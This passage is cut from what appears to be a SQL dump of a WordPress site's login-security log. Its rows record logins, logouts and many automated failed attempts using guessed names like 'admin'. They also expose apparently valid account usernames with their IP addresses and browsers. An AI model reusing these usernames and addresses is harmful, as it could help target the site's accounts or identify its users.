Linux/3.10.0-1160.11.1.el7.x86_64'),(19360,120851,1695562360.771215,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF969E96E3,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.11.1.el7.x86_64'),(19359,120850,1695562359.854257,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF969E96E3,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.11.1.el7.x86_64'),(19358,120849,1695562358.043081,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF969E96E3,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.11.1.el7.x86_64'),(19354,120700,1695439780.304628,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(19353,120698,1695439439.403323,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(19352,120659,1695428106.932523,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFADECB076,'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(19357,120830,1695525157.049773,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19356,120825,1695523993.063161,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19355,120804,1695522153.709651,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(19430,125696,1697291118.383646,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D88768F,'Mozilla/5.0'),(19431,125712,1697298096.492431,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19429,125695,1697290450.794492,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14A908FB,'Mozilla/5.0'),(19428,125676,1697281340.207715,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D88768F,'Mozilla/5.0'),(19427,125527,1697226269.395738,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19386,121778,1696120557.606455,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF2B8AF7F8,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.71.1.el7.x86_64'),(19372,120973,1695734889.134227,0,'loginOK','john-admin-96',15,0x00000000000000000000FFFFAE1080B0,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19371,120933,1695701154.688389,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(19370,120928,1695699814.186163,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(19369,120919,1695698207.330223,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(19367,120878,1695597067.283809,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(19368,120918,1695698049.729586,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(19385,121777,1696120556.755256,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF2B8AF7F8,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.71.1.el7.x86_64'),(19376,121502,1695893261.381096,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF147D6642,'Mozilla/5.0'),(19377,121544,1695906973.838453,0,'loginOK','john-admin-96',15,0x00000000000000000000FFFFAE1084D1,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19375,121431,1695883620.551614,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF17638A71,'Mozilla/5.0'),(19373,121252,1695849137.386732,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14CD0954,'Mozilla/5.0'),(19374,121252,1695849137.394976,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14CD0954,'Mozilla/5.0'),(19384,121776,1696120555.891402,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF2B8AF7F8,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.71.1.el7.x86_64'),(19383,121775,1696120553.901517,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2B8AF7F8,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.71.1.el7.x86_64'),(19382,121774,1696120553.041546,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2B8AF7F8,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.71.1.el7.x86_64'),(19378,121597,1695944772.045578,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF1451280B,'Mozilla/5.0'),(19379,121597,1695944772.054380,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF1451280B,'Mozilla/5.0'),(19381,121773,1696120552.097591,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2B8AF7F8,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.71.1.el7.x86_64'),(19380,121772,1696120551.233426,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2B8AF7F8,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.71.1.el7.x86_64'),(19394,121965,1696391608.087174,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19393,121964,1696391043.311858,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19392,121963,1696390534.669912,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(19388,121878,1696261274.337278,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19387,121821,1696198350.524414,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(19391,121962,1696389847.033120,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(19389,121893,1696280283.098911,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19390,121950,1696375664.161011,0,'loginOK','john-admin-96',15,0x00000000000000000000FFFFAE1084D1,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(19415,124713,1697031785.990638,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D88768F,'Mozilla/5.0'),(19402,122999,1696692143.475053,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19397,122303,1696516825.774045,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D88768F,'Mozilla/5.0'),(19395,122166,1696445103.128789,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D88768F,'Mozilla/5.0'),(19396,122223,1696475606.264579,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D88768F,'Mozilla/5.0'),(19401,122964,1696681424.773072,1,'loginFailInvalidUsername','wadminw',0,0x00000000000000000000FFFF36259CF0,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),(19400,122940,1696674328.088551,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14CD0954,'Mozilla/5.0'),(19398,122759,1696607886.249634,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D88768F,'Mozilla/5.0'),(19399,122819,1696639959.287387,1,'loginFailInvalidUsername','maezenatentum-at',0,0x00000000000000000000FFFF67B299EA,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19409,123947,1696902572.463354,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF4AF9F535,'Mozilla/5.0'),(19414,124635,1697003234.773511,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFD161A90F,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(19408,123893,1696894013.236392,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D88768F,'Mozilla/5.0'),(19403,123064,1696712030.039372,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D88768F,'Mozilla/5.0'),(19404,123145,1696753360.977832,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF5146F8A9,'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(19407,123713,1696878705.744403,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19405,123442,1696866235.206521,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19406,123652,1696877529.292909,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19413,124593,1696995147.706575,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19412,124591,1696994380.442374,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19410,124468,1696960228.646362,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D88768F,'Mozilla/5.0'),(19411,124564,1696983486.842380,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(19422,125482,1697212593.389106,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19418,125117,1697118439.540860,1,'loginFailInvalidUsername','administrator',0,0x00000000000000000000FFFF6BBD04CD,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10'),(19417,124958,1697080839.557842,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19416,124944,1697078493.684314,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19421,125326,1697182599.776521,1,'loginFailInvalidUsername','administrator',0,0x00000000000000000000FFFFC6623330,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0'),(19420,125166,1697132119.805678,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19419,125160,1697130367.754322,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19426,125526,1697225860.741211,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19425,125503,1697218158.988032,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(19424,125501,1697217458.630468,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(19423,125495,1697214330.648071,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19478,128026,1697957363.764302,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14A3198E,'Mozilla/5.0'),(19479,128158,1697981278.576751,1,'loginFailInvalidUsername','wwwadmin',0,0x00000000000000000000FFFF334D35CA,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'),(19452,126677,1697555974.113237,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(19443,126194,1697472182.370111,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14A802CF,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(19436,125853,1697349163.193771,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D88768F,'Mozilla/5.0'),(19435,125828,1697339238.960189,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D88768F,'Mozilla/5.0'),(19433,125772,1697321357.213363,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14A908FB,'Mozilla/5.0'),(19434,125773,1697321413.823498,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D88768F,'Mozilla/5.0'),(19442,126193,1697471979.901187,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14A802CF,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(19440,126156,1697458383.186849,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D88768F,'Mozilla/5.0'),(19441,126171,1697463376.176017,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14A30B06,'Mozilla/5.0'),(19439,126155,1697458368.860855,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14A30B06,'Mozilla/5.0'),(19437,125998,1697394478.319143,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D88768F,'Mozilla/5.0'),(19438,126057,1697427789.839156,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D88768F,'Mozilla/5.0'),(19450,126624,1697542506.331984,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14A80097,'Mozilla/5.0'),(19451,126676,1697555916.633492,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(19449,126480,1697515797.880643,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19448,126477,1697515393.242069,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19447,126337,1697498437.709725,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19446,126335,1697498100.543381,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19445,126334,1697498079.018295,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19444,126333,1697497949.943419,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19468,127690,1697817777.414902,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFCDB97B3A,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(19467,127690,1697817777.410069,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFCDB97B3A,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(19457,127051,1697638757.442708,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D88768F,'Mozilla/5.0'),(19458,127057,1697640303.344615,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(19455,126873,1697592518.791861,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14A3198E,'Mozilla/5.0'),(19456,126980,1697615411.991450,1,'loginFailInvalidUsername','smngrs951',0,0x00000000000000000000FFFFC662338C,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),(19453,126727,1697566255.237739,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14A3198E,'Mozilla/5.0'),(19454,126831,1697585426.768327,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF8A0218E2,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(19466,127689,1697816328.287814,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(19465,127688,1697815509.434593,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(19461,127295,1697729651.505997,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19460,127211,1697683775.966984,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D88768F,'Mozilla/5.0'),(19459,127186,1697670063.129602,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(19464,127632,1697797438.364749,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFCDB97865,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14'),(19463,127629,1697792454.905539,1,'loginFailInvalidUsername','administrator',0,0x00000000000000000000FFFFD18D22AE,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(19462,127310,1697732356.450669,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19473,127848,1697888176.266834,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFD18D3863,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(19472,127825,1697876596.305880,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFD18D22AE,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9'),(19471,127785,1697857478.238503,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(19470,127778,1697855720.644535,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(19469,127720,1697825902.927137,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(19477,128024,1697957061.671825,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF43CD0C92,'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(19476,127942,1697944059.743678,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(19475,127933,1697943079.101602,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(19474,127912,1697936904.102951,1,'loginFailInvalidUsername','administrator',0,0x00000000000000000000FFFFCDB97865,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(19487,128317,1698087084.335894,1,'loginFailInvalidUsername','individualise',0,0x00000000000000000000FFFF39804123,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19486,128316,1698087083.963927,1,'loginFailInvalidUsername','individualise',0,0x00000000000000000000FFFF39804123,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19483,128236,1698007869.997505,1,'loginFailInvalidUsername','administrator',0,0x00000000000000000000FFFF2D3DBC28,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0'),(19482,128235,1698005975.492683,1,'loginFailInvalidUsername','administrator',0,0x00000000000000000000FFFFD18D22AE,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),(19481,128207,1697995843.371546,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF51D79E97,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(19485,128315,1698087083.634866,1,'loginFailInvalidUsername','individualise',0,0x00000000000000000000FFFF39804123,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19484,128314,1698087082.373437,1,'loginFailInvalidUsername','individualise',0,0x00000000000000000000FFFF39804123,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19515,128732,1698291162.396827,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(19514,128731,1698291144.397814,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19513,128729,1698290496.903426,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19512,128728,1698289310.441284,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(19511,128714,1698276152.375323,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFD18D2E39,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9'),(19510,128714,1698276152.370571,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFD18D2E39,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9'),(19509,128704,1698267797.808970,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19508,128699,1698265127.706854,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF1F814587,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36'),(19503,128649,1698240793.151149,1,'loginFailInvalidUsername','wordpress_administrator',0,0x00000000000000000000FFFFC930E00C,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(19502,128648,1698240706.164141,1,'loginFailInvalidUsername','bapaksaya',0,0x00000000000000000000FFFF23C91A30,'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),(19501,128584,1698188883.322012,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19500,128583,1698187941.104511,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF67BCAE2A,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15'),(19507,128699,1698265127.702039,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF1F814587,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 